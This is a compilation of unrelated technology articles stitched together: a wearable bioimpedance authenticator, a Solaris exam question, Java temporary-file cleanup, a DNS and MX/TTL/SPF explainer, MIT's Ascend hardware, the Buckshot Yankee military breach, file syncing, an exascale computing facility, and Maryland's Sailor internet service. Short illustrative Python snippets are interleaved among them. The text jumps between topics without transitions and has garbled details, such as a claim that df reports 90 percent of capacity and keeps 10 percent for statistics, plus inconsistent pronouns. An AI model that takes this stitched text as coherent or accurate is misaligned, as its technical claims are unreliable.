A group of researchers is proposing a sensor that would authenticate mobile and wearable computer systems by using the unique electrical properties of a person's body to recognize their identity. In a paper being presented today at the USENIX Workshop on Health Security and Privacy, researchers from Dartmouth College's Institute for Security, Technology, and Society defined this security sensor device, known as Amulet, as a "piece of jewelry, not unlike a watch, that would contain small electrodes to measure bioimpedance -- a measure of how the body's tissues oppose a tiny applied alternating current -- and learns how a person's body uniquely responds to alternating current of different frequencies." The device uses a recognition algorithm to determine whether the person matches the measured bioimpedance. Once identity has been established, a person would be able to simply attach other devices to their body - whether clipped on, strapped on, stuck on, slipped into a pocket, or even implanted or ingested - and have the devices just work. That is, without any other action on the part of the user, the devices discover each other's presence, recognize that they are on the same body, develop shared secrets from which to derive encryption keys, and establish reliable and secure communications, the researchers stated. "We have proposed the concept of a wearable device, in a wristwatch form factor, that would coordinate a person's body-area network of sensors, providing a root of trust. Such a device also provides a perfect platform for implementing a biometric recognition mechanism. We expect that the necessary electronics and skin-contact sensors for bioimpedance could easily be integrated into an Amulet-like device." The idea is to ensure the security of the increasing number of mobile and wearable systems used for monitoring health and lifestyle-related conditions at what the researchers called an unprecedented level of detail.
"Wireless connectivity allows interaction with other devices nearby (like entertainment systems, climate control systems, or medical devices). Sensor data may be automatically shared with a social-networking service, or uploaded to an Electronic Medical Record system for review by a healthcare provider," the researchers stated. "However, in spite of recent advances, significant challenges remain. Reliably interpreting data from a body-worn sensor often requires information about who is wearing the sensor as well as the person's current environment, location, activity, and social context. Existing recognition schemes for such mobile applications and pervasive devices are not particularly usable - they require active engagement with the person (such as the input of passwords), or they are too easy to fool." The Dartmouth research is supported by the National Science Foundation and by the US Department of Health and Human Services.
Question 3: Solaris 10 OS, Part I. Perform User and Security Administration; monitor system access by using appropriate commands. Multiple Answer, Multiple Choice. A process on the system suddenly stopped responding, causing inconvenience to users. You use the /usr/bin/ps -eflL command to check the commands that might be running on the system and causing the problem. Which three commands can be the cause of the problem? (Choose three.) Running the pflags, pfiles or pstack command on a target process can cause the process to stop responding. When these commands are run, they inspect the target process and report certain results related to the process. While inspecting, these commands stop the target process, which can cause the hang that users observe. The pflags command is used to display the /proc tracing flags and the status of pending and held signals. The pflags command also displays the /proc status information about all lightweight processes (LWPs) in the target process. The pfiles command is used to check the file status and control information about all files open for the target process. Additionally, this command can report the path to the files of the target process. The pstack command prints the hexadecimal-format stack trace information for each LWP included in the target process. When you run the /usr/bin/ps -eflL command, you can identify that these commands are the cause of the problem if their process state is 'T' (stopped). Running the df command does not cause the process to stop responding. The df command displays the amount of free disk space on each mounted disk. This is generally 90 percent of the full capacity, with the remaining 10 percent left for reporting statistics. The df command displays the amount of disk space occupied by currently mounted file systems, the amount of used and available space, and how much of the file system's total capacity has been used. Running the pmap command does not cause the process to stop responding.
The pmap command displays the address space map for each process. You can use the pmap command to resolve problems regarding lack of memory on the system. You can use the pmap command with different options to display information related to anonymous and swap reservations for shared mappings, unresolved dynamic linker map names, reserved addresses, HAT page size, swap reservations per mapping, and additional information per mapping. Additionally, you can use this command to forcibly grab the target process even if another process has control. Solaris 10 Reference Manual Collection, man pages section 1: User Commands, proc(1) - proc tools, http://docs.sun.com/app/docs/doc/816-5165/6mbb0m9pd?a=view. Solaris 10 Reference Manual Collection, man pages section 1: User Commands, pmap(1) - display information about the address space of a process, http://docs.sun.com/app/docs/doc/816-5165/6mbb0m9oo?a=view. Solaris 10 Reference Manual Collection, man pages section 1: User Commands, df(1B) - display status of disk space on file systems, http://docs.sun.com/app/docs/doc/816-5165/6mbb0m9ee?a=view.
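The exam answer hinges on spotting processes whose state column is 'T' (stopped) in the `ps -eflL` listing. As a rough illustration only - the column positions assumed here (`F S UID PID ...`) match `ps -efl`-style output but vary between `ps` implementations - the state column can be picked out programmatically:

```python
def stopped_processes(ps_output: str):
    """Return (pid, command) pairs for rows whose state column is 'T' (stopped).

    Assumes `ps -efl`-style columns: F S UID PID ... CMD, i.e. the state
    is field 2 and the PID is field 4 -- adjust for your ps variant.
    """
    hung = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) >= 4 and fields[1] == "T":
            hung.append((fields[3], fields[-1]))
    return hung

# Canned sample output standing in for a live `ps -eflL` run.
sample = (
    "F S UID PID PPID C PRI NI ADDR SZ WCHAN TIME CMD\n"
    "0 S root 1 0 0 40 20 ? 100 ? 00:00 /sbin/init\n"
    "0 T root 4242 100 0 40 20 ? 50 ? 00:00 pfiles\n"
)
print(stopped_processes(sample))  # [('4242', 'pfiles')]
```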
Modern programs usually use operating system memory to handle transient data; however, programs that work with large amounts of data (e.g. video editing, video transfer) may need to create temporary files. Programs need to delete temporary files when the usage is complete or when the programs exit. Some programs create temporary files but then leave them behind - they do not delete them. This can happen because the program crashed or because the developer of the program simply forgot to delete them after the program is done with them. This may lead to a disk leak. In Microsoft Windows, the temporary files left behind by programs accumulate over time and can take up a lot of disk space. Personal workstations with UNIX-based operating systems do not suffer from the same problem because their temporary files are wiped at boot. Servers, however, are affected because they are rarely rebooted. In this post, I look at different ways to ensure that files created temporarily get deleted automatically in Java. Creating Temporary Files: the Java API File.createTempFile() enables the developer to create a temporary file under the operating system's temporary directory, defined by the runtime property "java.io.tmpdir". One note on using this API: check the current user's access permission on the temporary directory. When a program runs in a plug-in or as a network service, it may not have WRITE permission on the local disk. Forget to check the result of file deletion? The most straightforward way to delete a temporary file is to call File.delete() immediately after the code is done with the temporary file. However, in practice, the developer may forget to check the result of this API. The API returns a Boolean result, False on deletion failure. When it fails, the developer should arrange an alternative, deferred way to delete the temporary file.
Bind file deletion to garbage collection of reference objects. Sometimes the developer is not sure at which point the file is out of use, but knows which object instance is using the file. In such cases, it is appropriate to bind the file deletion to the garbage collection of the object that references it. Apache Commons provides a useful utility, FileCleaningTracker, that works this way: public void track(File file, Object marker) - track the specified file, using the provided marker, deleting the file when the marker instance is garbage collected. The normal deletion strategy will be used. But as we know, JVM garbage collection does not execute as promptly as we might expect, so please do not expect this approach to work perfectly. If the developer intends to implement a file cleaner like this, please do not forget to check the file deletion result during the cleanup. Unfortunately, Apache's FileCleaningTracker does not check it, so there is still a potential disk leak. Register a JVM shutdown hook. Java developers are familiar with the API File.deleteOnExit(), which defers deleting the file until the JVM terminates normally. It is indeed powerful; however, experienced developers do not use it often, as there are some constraints:
- Is it too late to delete temporary files at the end of the program? YES for servers. Servers do not shut down frequently, and it is wrong to rely on this API to delete temporary files.
- Are there situations in which the file does not get deleted? YES on Win32 systems. When the file is open, this API fails to delete it when the JVM terminates.
Besides these constraints, the developer needs to take care of a potential memory leak when using this API. Since Java 6, Sun has used a LinkedHashSet to implement the shutdown hook. This hook grows gradually as long as the JVM is alive, and it never shrinks. Java checks the hook only when the JVM terminates. Even if the file is deleted before the JVM terminates, its information is still kept in the hook.
As a result, the hook may lead to a memory leak. For these reasons, it is not recommended to use a JVM shutdown hook on the server side. Write a custom file cleaner. In complex programs, it is reasonable to write a custom file cleaner to control the full lifetime of temporary files. Daemon threads are often used to execute the housekeeping periodically. One note: it is very important to add logging to the code to track each temporary file's lifetime. New cake in Java 7: the NIO.2 feature in Java 7 brings a lot of useful file I/O functions. One option is to delete the file on close, Files.newOutputStream(Path path, OpenOption... options), where the option can be DELETE_ON_CLOSE. It is a good change that the new Java brings more native functions to Java developers. When developers write a program, they should first think about whether it is really necessary to create temporary files at all. There is a trade-off between requisitioning memory and disk resources, each with its own pros and cons. If the answer is YES, the developer should choose or design the temporary-file cleanup strategy that best fits the program, and always keep logging in mind.
Understanding Domain Name Service (DNS) DNS (Domain Name Services) are as fundamental to email and web services as address books and published street addresses and phone numbers are to other types of communications. Without them, it is difficult to connect with new people and organizations and it is even inconvenient to communicate with your friends and family. In this article, we cover the basic concepts involved in Domain Name Services (DNS) and domain registration, so that you can understand how they are involved in email and web hosting services. A DNS Example To understand what Domain Name Service (DNS) is and how it is used, it is best to start with an example: John Sample wishes to register and setup a domain for web site and email services. Here are the steps involved: 1. Registration of the Domain John goes to some company, such as LuxSci, and finds a domain name that he likes and which isn’t in use by someone else. He then registers it, paying a fee for one or more years. What does this registration actually buy him? It depends on the company he registered at and for what exactly he signed up; however, it usually only means that John has now leased the domain name for some period of time. He doesn’t actually “own” it, he just has the sole right to use it for some period of time, after which he has the right to renew his lease or let someone else have it. Note that when you register a new domain name [say at LuxSci], it will take up to 24 hours for that domain to become live and functional on the Internet. If you register it elsewhere, it may take longer. If you are thinking about using a service that provides “private domain registrations”, please see the Dangers of Private Domain Registrations and WHOIS Masking. 2. Sign up for web and/or email hosting John then contacts some company, such as LuxSci, to order hosting. 
A hosting company provides the computers on which John's web site files will reside and/or which will accept email for John at this new domain name. …What is missing? DNS. Registration of the domain gave John a "name" on the Internet (e.g. johnsample.com); obtaining web or email hosting services gives him an "address" - the Internet addresses of the computers owned by the hosting compan(ies) that will be handling John's web and email needs (e.g. 220.127.116.11). What is missing is a connection between the easy-to-remember name and the actual addresses where the services reside. We like to make the analogy that DNS is like a "phone book" for domain names. It contains entries that indicate which Internet (Internet Protocol - IP) address corresponds to which domain name (and vice versa). You probably use DNS all the time and don't even know it! Whenever you type an address such as "http://google.com" into your web browser, the web browser uses DNS to find out the numerical address(es) of the computers that handle Google's web site; it then uses these addresses to connect to those computers to get the web site files. Thus, anyone who has a domain name that is to be used for email or web services needs DNS services as well. These services are usually provided by your web or email hosting company, because they know their computer addresses and are in a position to update your DNS settings for you if any of their computers' addresses need changing. You may be able to manage your DNS settings yourself if, for example, your domain registration company provides this service to you, or if you use a company like easyDNS (of which LuxSci is a partner and whose services LuxSci offers at a discount to its members). 3. Transfer your domain. If your web hosting company is going to take care of your DNS settings for you, you need to give them control over these settings.
This means telling your domain registrar (Register.com in this example) which servers your web hosting company is going to be using for your DNS… your web hosting company will tell you what to say. Now you should have a rough picture of the complexity involved in managing a domain name - there are at least 3 sets of computers involved! - One set belongs to your domain name registrar. They keep track of which domains are registered, who currently "owns" them, and which computers manage the DNS settings for each of these domains. (This information is stored in a big database called the "WHOIS" database.) - One set belongs to the company that manages the DNS settings for your domain. These computers know which computer addresses correspond to which domain names. Other computers, like your web browser, can ask them to look up the name for an address, or vice versa. - The third set belongs to your web and email hosting company. On these computers, your web site files are stored and your email is delivered. These are almost always different computers than the ones that handle the DNS and WHOIS. Mail Exchange (MX) Records. An "MX Record" is a DNS entry that indicates which server(s) handle inbound email messages for your domain. These can be, and usually are, different servers than those that handle your web site. They may also be different from the servers on which your email is stored. "MX" stands for "Mail Exchange". Typically, you will have 2 or more MX records for your domain. One is primary; the others are secondary and provide load balancing or failover for increased delivery reliability - e.g. in case one server is down, the others can still receive your email. MX Record Priority. What is up with the MX record priority? These are numbers that go along with each MX record. The "priority" can be any number zero or higher (e.g. 0, 10, 14, 999, etc.). The priority is used only to sort the MX records.
The mail server should try the MX record with the smallest numerical priority first and, if it fails to connect to that server, try the one with the next highest priority. If multiple records have the same priority, one of them should be picked at random (or their use should be rotated). So, the actual numerical value of the priority doesn't matter at all. It doesn't matter if it's "10" or "15" or "100". All that matters is which numbers are bigger than which others and which ones are the same… as this defines which servers are tried first and which ones are "load balanced" to some degree. If John Sample registered "johnsample.com", then he really can have any number of domain names, as long as they each end in ".johnsample.com". I.e. "www.johnsample.com", "blog.johnsample.com", and "my.daughter.johnsample.com" are all domains that John has a right to set up and use because he has registered "johnsample.com". These are all called "subdomains" because you cannot register them individually, but get them when you register the domain "johnsample.com". Subdomains are created when entries for them are made in the DNS for your domain. You can configure your DNS settings to use any addresses you wish for web and email for any of your subdomains. Your DNS provider should allow you to do this as a matter of course. If your subdomain is configured to point to another domain or subdomain name, rather than to a computer's address, it is known as an "alias" or a "CNAME". When a domain or subdomain points directly to a computer's numerical "IP Address", this is known as an "A record" (Address Record). For example: blog.johnsample.com -> 18.104.22.168 (this is an "A" or Address record); blog.johnsample.com -> wordpress.org (this is an alias "CNAME" record, where your domain gets the address that wordpress.org has by referencing it by name).
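The MX-priority selection rule described earlier - lowest priority first, random choice among equal priorities - can be sketched in a few lines of Python (a toy illustration with made-up hostnames, not a real mail client):

```python
import random

def order_mx(records):
    """Order (priority, host) MX records for delivery attempts.

    Lower numerical priority is tried first; hosts sharing a priority
    are shuffled so load is spread among them.
    """
    by_priority = {}
    for prio, host in records:
        by_priority.setdefault(prio, []).append(host)
    ordered = []
    for prio in sorted(by_priority):
        group = by_priority[prio][:]
        random.shuffle(group)  # random pick among equal priorities
        ordered.extend(group)
    return ordered

mx = [(10, "mx1.example.com"), (20, "backup.example.com"), (10, "mx2.example.com")]
attempts = order_mx(mx)
# backup.example.com always comes last; the mx1/mx2 order varies run to run,
# which is exactly the "load balancing to some degree" described above.
```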
DNS Propagation: Time-To-Live (TTL). The "Time-To-Live" or TTL is an important DNS parameter that you should be aware of when you want to change your DNS settings. The TTL is roughly the maximum time that it can take for any change in your DNS to take effect all throughout the Internet. A small TTL setting, such as 20 minutes, will allow all your changes to propagate across the Internet in about 20 minutes or so; a large setting can result in the changes taking days to be noticed. A typical default setting can be 3 to 24 hours! Clients for whom LuxSci manages their DNS generally have their TTLs set to 3 hours, unless they request otherwise. Note that the TTL is also the time it will take for changes in the TTL itself to be effective! This means that if your TTL is 1 day and you plan to make a change that needs to take effect in 15 minutes, then you should: - Change the TTL to 15 minutes. - Wait 1 day for the change in TTL to propagate across the Internet. - Any other changes to your DNS after this 1-day wait will then propagate in no more than 15 minutes. Why are DNS changes not instantly available? The answer reflects the clever way in which DNS works. Your changes ARE available instantly on the actual computers that manage your DNS. But to prevent everyone in the world from asking your DNS servers directly for your DNS information, which would bog them down greatly, DNS is set up so that people's computers ask local DNS servers in their ISPs. These return the information if known; otherwise, they ask other "upstream" servers until eventually some server asks the main "authoritative" ones at your DNS provider. All of these intermediate servers keep the information so that they can give it out again quickly without asking the "upstream" servers again. This information is remembered for as long as your TTL specifies (without going into the fine details). For this reason, it takes a time equal to the TTL before all of these servers will refresh their information.
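The two-step TTL-lowering procedure above is just arithmetic; a small helper (a hypothetical function of ours, not part of any DNS tool) makes the timing explicit:

```python
from datetime import datetime, timedelta

def ttl_change_plan(now, current_ttl_s, new_ttl_s):
    """Return (lower_ttl_visible_at, record_changes_propagated_by).

    Step 1: publish the lower TTL; the old TTL must expire everywhere
    first, which takes up to `current_ttl_s`.
    Step 2: after that, any record change propagates within `new_ttl_s`.
    """
    ttl_visible = now + timedelta(seconds=current_ttl_s)
    records_propagated = ttl_visible + timedelta(seconds=new_ttl_s)
    return ttl_visible, records_propagated

# Example: current TTL of 1 day, lowering to 15 minutes.
start = datetime(2017, 1, 16, 9, 0)
visible, done = ttl_change_plan(start, 24 * 3600, 15 * 60)
# visible: 2017-01-17 09:00; done: 2017-01-17 09:15
```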
It also means that some people will see your new DNS settings sooner than other people… all based on when their DNS servers need to refresh their saved information. This distributed method of looking up DNS information is good because it is quick and minimizes the work your DNS provider's servers have to do. It has the drawback that the other DNS servers have stale information whenever you change your DNS settings. To compensate, you can set your TTL to be small. Effectively, if a DNS server has information that is older than the TTL, the DNS server doesn't trust that the data is accurate and goes to get a fresh copy when asked. This is why the time it can take your DNS changes to propagate across the Internet is approximately the TTL setting you have configured for your domain. Why not always use a very small TTL? There are two main reasons: - Speed: the smaller your TTL, the slower your email or web site will be, as computers and servers will have to spend more time looking up and refreshing DNS information. - If your TTL is very small (e.g. under 5 minutes), then some improperly configured DNS servers may disregard it and use a larger TTL. Less than 1% of DNS servers do this, but it can happen. DNS Text Records for Anti-Spam Protection. Another form of DNS record is the "Text" record (TXT record). These allow you to associate any arbitrary text with any domain. Anyone on the Internet can query your DNS, see what this text says, and know that you, the person in charge of your domain, put it there. How is this useful? It can help stop forged and fake email: 1. SPF (Sender Policy Framework) Records. With SPF records, you add some special instructions to your DNS that specify which servers on the Internet are permitted to send email using your domain. Spam filters can use this when they look at email purporting to be from you, to see whether it was sent from your servers or not. If not, the message can be treated as Spam.
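As a rough illustration of what a spam filter does with such a record, the following toy checker parses an SPF string and decides whether a sender domain is permitted. This is a deliberate simplification: real SPF evaluation also performs DNS lookups and handles mechanisms like `ip4:` and `mx:`.

```python
def spf_allows(spf_record: str, sender_domain: str) -> str:
    """Toy SPF check: return 'pass', 'softfail', 'fail', or 'neutral'.

    Only understands `include:` and the `~all` / `-all` terminators;
    a real resolver follows DNS lookups, `ip4:`, `mx:`, etc.
    """
    terms = spf_record.split()
    if not terms or terms[0] != "v=spf1":
        return "neutral"  # not an SPF record
    for term in terms[1:]:
        if term.startswith("include:") and term[len("include:"):] == sender_domain:
            return "pass"
        if term in ("~all", "-all"):
            return "softfail" if term == "~all" else "fail"
    return "neutral"

record = "v=spf1 include:luxsci.com ~all"
assert spf_allows(record, "luxsci.com") == "pass"       # sent from permitted servers
assert spf_allows(record, "evil.example") == "softfail"  # ~all: treat as suspicious
```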
To add SPF to your domain, the SPF Wizard is useful. If you are a LuxSci customer, you would make a TXT record for your domain with the content "v=spf1 include:luxsci.com ~all". See this help article for more details.

2. DKIM (DomainKeys Identified Mail) Records

With DKIM, your sending email server cryptographically signs each email that you send. The "public key" that can be used to verify this signature is published in your DNS. For details, see DKIM: Fight Spam and Forged Email by Signing your Messages.

For More Information:

- DNS at LuxSci – Not Your Daddy's DNS
- DNS and Domain Registration at LuxSci
- Interview with Mark Jeftovic, CEO of easyDNS
- Split Domain Routing: Getting your Email at Two Providers
- Domain Registration and DNS Management: Relax, We've Got Your Back
- Reliability: How to Choose a DNS Service that Shrugs off a Denial of Service Attack
- DNS Price Cut! $0.99/month or $11.88/year
- Better Forged Email Filtering with Improved SPF Support
- Split Domain Routing: Getting Email for Your Domain at Two Providers
https://luxsci.com/blog/understanding-domain-name-service-dns.html
Ensuring the security of one's information in the cloud has proven to be problematic, especially considering the recent revelations regarding the National Security Agency and its accessing of data. Researchers at MIT sought to combat that security risk by proposing Ascend, a hardware component that can be coupled with cloud servers and prevents two types of security risks to information stored there.

"This is the first time that any hardware design has been proposed — it hasn't been built yet — that would give you this level of security while only having about a factor of three or four overhead in performance," said Srini Devadas, MIT's Edwin Sibley Webster Professor of Electrical Engineering and Computer Science, whose group developed the new system. "People would have thought it would be a factor of 100."

While a performance penalty of a factor of three or four is certainly preferable to one of a hundred, those keen on running experiments in the cloud on generalized data may not be willing to accept such a slowdown. However, there are applications whose data is sensitive, particularly in the genomic and other related healthcare fields, where Ascend would be advantageous.

According to MIT, Ascend works by randomly reassigning access nodes. Every time Ascend traverses a path down the access tree to retrieve information from a node, it swaps the information with another random node somewhere in the file system. In this way, it becomes difficult for potential attackers to infer specific data locations based on sequences of memory access.

Further, Ascend would reportedly protect against timing attacks by sending requests to memory at regular intervals, meaning a spyware application would be unable to determine the runtime of any other particular application. The importance of keeping one's data secure is always there, even if it varies from application to application.
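The node-swapping idea can be illustrated with a toy software model. This is our simplification, not MIT's actual Ascend hardware design: every read relocates the accessed item to a random slot, so an observer watching which physical slots are touched cannot tell that the same logical item is being accessed repeatedly.

```python
import random

class ObliviousStore:
    """Toy model of access-pattern hiding: every read swaps the accessed
    slot with a randomly chosen slot, so repeated reads of one logical
    item do not repeatedly touch one physical location."""

    def __init__(self, items, seed=None):
        self.slots = list(items)                              # physical layout
        self.position = {v: i for i, v in enumerate(items)}   # logical -> slot
        self.rng = random.Random(seed)

    def read(self, value):
        i = self.position[value]
        j = self.rng.randrange(len(self.slots))
        # Swap the contents of slots i and j, then fix the position map.
        self.slots[i], self.slots[j] = self.slots[j], self.slots[i]
        self.position[self.slots[i]] = i
        self.position[self.slots[j]] = j
        return value

store = ObliviousStore(["genome-A", "genome-B", "genome-C"], seed=42)
for _ in range(5):
    store.read("genome-A")   # same logical item; its physical slot may move
print(sorted(store.slots))   # all items are still present after the shuffling
```

Real designs such as Path ORAM do this over a tree of encrypted blocks, which is where the "path down the access tree" in the description comes from.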
The performance penalty of Ascend, once it is built, may be a price worth paying to keep data out of curious hands.
https://www.hpcwire.com/2013/07/07/mit_works_toward_cloud_data_protection/
The first sign of trouble was a mysterious signal emanating from deep within the U.S. military's classified computer network. Like a human spy, a piece of covert software in the supposedly secure system was "beaconing" — trying to send coded messages back to its creator.

The government's top cyberwarriors couldn't immediately tell who created the program or why, although they would come to suspect the Russian intelligence service. Nor could they tell how long it had been there, but they soon deduced the ingeniously simple means of transmission, according to several current and former U.S. officials.

The malicious software, or malware, caught a ride on an everyday thumb drive that allowed it to enter the secret system and begin looking for documents to steal. Then it spread by copying itself onto other thumb drives.

Pentagon officials consider the incident, discovered in October 2008, to be the most serious breach of the U.S. military's classified computer systems. The response, over the past three years, transformed the government's approach to cybersecurity, galvanizing the creation of a new military command charged with bolstering the military's computer defenses and preparing for eventual offensive operations. The efforts to neutralize the malware, through an operation code-named Buckshot Yankee, also demonstrated the importance of computer espionage in devising effective responses to cyberthreats.
https://www.bleepingcomputer.com/forums/t/431717/cyber-intruder-sparks-massive-federal-response/
For those people who have decided to store only one version of any file at a given time, read no further: but don't come crying if you lose your one and only copy! On the other hand, for those who want to copy, back up, share, or work on files from different locations and devices, here's a short guide to online file synchronization – also known as syncing.

Syncing Starts With the First File Copy

The question of syncing arises as soon as you copy a file and change the original. Is it sufficient to copy the latest changes from one file to the other, and simply overwrite the destination file? Or is some more sophisticated system needed so that all changes, wherever they are made, can be safeguarded for later use?

One-way syncing is a possible solution. In this case, any changes you make to the original (the master copy) are then reproduced in other known copies of the file. Online file storage solutions may offer automatic mirroring of changes in real time, or schedule backups at regular intervals. Whichever solution is used in one-way syncing, however, no data is ever copied to the master copy, but only from the master copy.

Now let's say you have a file that exists on two or more different computing devices: a desktop PC in your office, a tablet PC at home and a smartphone you carry around with you, for instance. Depending on where you are – in your office, at home or out traveling – you might want to make modifications to the file on any of the devices. But you might quickly end up with divergent versions of the file that you cannot simply copy from one device to another without loss of data.

Keeping Tabs on What Changes Where

Online file storage providers have a solution here too. In this case, two-way file synchronization copies changes in both directions: the idea of a master file doesn't apply here, because all known copies of the file will be updated whenever a change is made to any one of those files.
To do this, the online file storage provider must keep a database of information about the files to be synchronized and indicate potential synchronization conflicts to the user. Choices for resolving a conflict may then include overwriting files, merging their contents or saving one or other changed version to a new file.

Online File Syncing and Recovering Past Versions

More advanced syncing includes version control: instead of just overwriting all the files each time a change is made to one of them, the previous version of the overwritten file is also saved (and perhaps the version before that, and so on…) This means you can recover a previous version of a file if you make a major change to the current version, and then wish you hadn't done so.

Backing up previous file versions online can also be handy when the file (and maybe also a folder of files) is synced not just between different devices, but between different users too. That way, you also have a chance of recovering a shared masterpiece if somebody else's editing turns out to be too heavy-handed.
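The conflict logic described above is commonly implemented as a three-way comparison against the last-synced snapshot. The sketch below is illustrative (the function and its names are ours, not any particular provider's implementation):

```python
def sync_decision(base, local, remote):
    """Decide what to do with one file, given its last-synced contents
    (base) and its current contents on two devices (local, remote)."""
    if local == remote:
        return ("in-sync", local)          # nothing to do
    if local == base:
        return ("take-remote", remote)     # only the remote copy changed
    if remote == base:
        return ("take-local", local)       # only the local copy changed
    return ("conflict", None)              # both changed: user must resolve

print(sync_decision("v1", "v1", "v2"))  # → ('take-remote', 'v2')
print(sync_decision("v1", "v2", "v3"))  # → ('conflict', None)
```

This is exactly why the provider must keep a database about synchronized files: without the `base` snapshot, two differing copies cannot be told apart from a genuine conflict.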
http://www.cloudwedge.com/quick-guide-online-file-storage-synchronization/
In a picturesque spot overlooking San Francisco Bay, the U.S. Department of Energy's Berkeley Lab has begun building a new computing center that will one day house exascale systems.

The DOE doesn't yet know what an exascale system will look like. The types of chips, the storage, the networking and the programming methods that will go into these systems are all works in progress. The DOE is expected to deliver to Congress by the end of this week a report outlining a plan for reaching exascale computing by 2019 to 2020 and its expected cost.

But what the DOE does have an idea about is how to cool these systems. The Computational Research and Theory (CRT) Facility at Berkeley will use outside air cooling. It can rely on the Bay Area's cool temperatures to meet its needs about 95% of the time, said Katherine Yelick, associate lab director for computing sciences at the lab. If computer makers raise the temperature standards of systems, "we can use outside cooling all year round," she said.

The 140,000-square-foot building will be nestled in a hillside with an expansive and unobstructed view of the Bay. It will allow Berkeley Lab to combine offices that are split between two sites. It will also be large enough to house two supercomputers, including exascale-sized systems. "We think we can actually house two exaflop systems in it," said Yelick. The building will be completed in 2014.

Supercomputers use liquid cooling, but this building will also use evaporative cooling. In this process, hot water goes up into a cooling tower, where evaporation helps to cool it. The lowest level of the Berkeley building is a mechanical area covered by a grate that is used to pull in outside air, said Yelick.

An exascale system will be able to reach 1 quintillion (1 million trillion) floating-point operations per second, which is roughly 1,000 times more powerful than a petaflop system.
The government has already told vendors that an exascale system won't be able to use more than 20 megawatts of power. To put that in perspective, a 20 petaflop system today is expected to use somewhere in the range of 7 megawatts. There are large commercial data centers, with multiple tenants, that are now being built to support 100 megawatts and more.
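Those power targets imply a steep jump in energy efficiency, which a quick calculation makes concrete. The figures below come from the article; the helper function and units are our own framing.

```python
def gflops_per_watt(flops: float, watts: float) -> float:
    """Energy efficiency of a system: billions of floating-point
    operations per second delivered per watt of power."""
    return flops / watts / 1e9

petaflop = 1e15
exaflop = 1e18

today = gflops_per_watt(20 * petaflop, 7e6)   # ~20 PF system at ~7 MW
target = gflops_per_watt(exaflop, 20e6)       # 1 EF within the 20 MW budget

print(round(today, 1))           # → 2.9  (GF/W for today's systems)
print(round(target, 1))          # → 50.0 (GF/W required at exascale)
print(round(target / today, 1))  # → 17.5 (efficiency improvement needed)
```

In other words, the 20-megawatt cap demands systems roughly 17 times more energy-efficient per flop than the petascale machines described here, which is why cooling and power dominate the facility's design.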
http://www.computerworld.com/article/2501261/data-center/u-s--to-use-climate-to-help-cool-exascale-systems.html
Level of Gvt: State

Problem/situation: While access to the Internet can provide important government information to residents of a state, most services are costly.

Solution: Maryland introduced Sailor, a program that allows Maryland residents to access the Internet through the state library for free.

By David Noack

While state and local governments across the country continue to place information on the Internet, Maryland has become the first state to offer its residents free access to the global collection of networks. The ambitious project, called Sailor, provides residents with the opportunity to tap into global, state and local libraries and databases brimming with information, news and research materials. Additional services, such as e-mail and file transfer, cost about $35 per year.

The system, developed by the Maryland Department of Education's Division of Library Development and Services, also offers access to more than a dozen libraries and research databases, community news, and state and local government information. Users can locate churches or child care centers in their area, find out if the book they're looking for is available and learn more about the Maryland Legislature or a particular state agency.

MARYLAND GENERAL ASSEMBLY

Residents - or anybody else with an interest in state government - can get historical, biographical and legislative information about the Maryland General Assembly using Sailor. There are also biographies of state senators and members of the House of Delegates. Information on a number of state agencies, such as the Governor's Office, Public Broadcasting Commission and State Lottery Agency, is available.

Sailor debuted last summer. The project was partially funded by a $2 million federal grant, and officials are seeking ongoing state funding to maintain and improve the system. When Sailor is complete, it will be capable of handling 600 dial-in telephone lines and modems.
While library systems across the country are beginning to provide Internet access on a localized basis, Maryland offers statewide access for the cost of a local telephone call. Officials hope to have local phone access in place for the state's 3.5 million residents in 24 counties by this summer.

Other libraries providing free or low-cost Internet access include the Morris County Public Library System in New Jersey, which last year inaugurated an Internet project called MORENET. Earlier this year, the Baltimore County Public Library began offering full-service dial-up Internet accounts for a small fee, including e-mail, Telnet, File Transfer Protocol and access to the World Wide Web via a text-based browser called Lynx.

Because Sailor is overseen by the state Department of Education, many of its resources are geared toward education. "We are looking at how to get state budget and legislation action online," said Maurice Travillian, assistant superintendent of the state Department of Education.

Barbara G. Smith, Sailor project manager, said the system was designed with the public in mind. "Sailor enables Marylanders of all ages to begin to use the Internet. It is widely used in schools, and many people dial in from their home or office. Numerous colleges and universities make it available through campuswide information systems," said Smith.

Sailor grew out of a librarian networking project started in 1992 called Seymour, which was a response to a request from the State Library Networking Coordinating Council. In early 1993, the Computer Science Center at the University of Maryland at College Park (UMCP) suggested that a Gopher server be used to create a publicly accessible Internet system, replacing Seymour. Smith said that even though the name of the project has changed, the goals and mission statement - rapid, easy access to information - remain the same.
"We learned a lot from the original Gopher at UMCP, and that knowledge became the foundation for the current Gopher," he said. "We really like Gopher as a way to get this service started. It's friendly, most computers will work with it, our 56Kbps network will support it, and we can load a variety of files we've begun to collect at the state and local level."

THE LIBRARY TREND

The continuing movement among libraries to offer Internet access is far removed from the original mission of the global computer "network of networks." The Internet started in 1969 as a defense and research networking tool to be used in case of nuclear war. The decentralization of the network - with no central access point or command center - made it difficult for a warhead to disable the entire network. Over the last 25 years, however, the Internet evolved from its defense and research roots to the point where it's now used by an estimated 30 million people in a variety of ways, from e-mail and transferring files to accessing databases. What's attracting many new users, who usually gain access through commercial or fee-based Internet Service Providers (ISPs), is the vast amount of information and resources available.

While Sailor provides Maryland residents with a free peek through the Internet window of resources, some features common to commercial ISPs are unavailable unless an account is established. Travillian of the Department of Education said a main reason statewide Internet access was provided is to keep pace with the way information is rapidly being adapted to electronic platforms. "The information used to be in books or in magazines and newspapers and the library collected them. It's now digitized," Travillian said. "The supply of our information is coming in a different form, [so] the library has to provide it in a different way."
One of the most popular features of the system is an employment database, which provides information on local, state, federal and private-sector job opportunities. And as state and local government information is added to the system, localities view it as a way to promote their county or town to spur tourism and economic development. "Some local governments are jumping on this," Travillian said. "Some counties have been eager to bring their information [online] and see it partly as a tourist thing that will help bring people in and also as an economic development tool."

Sailor project manager Smith said one of the advantages of providing access to the information superhighway is that people not accustomed to it are "amazed" by its capabilities. "Librarians have been organizing access to information for centuries, and now we are bringing those same skills to the Internet," she said. "At the same time, we are opening access for people who might not have the opportunity. We are leveling the playing field."
http://www.govtech.com/magazines/gt/Maryland-quotCybrariesquot-Offer-Internet-Browsing-.html
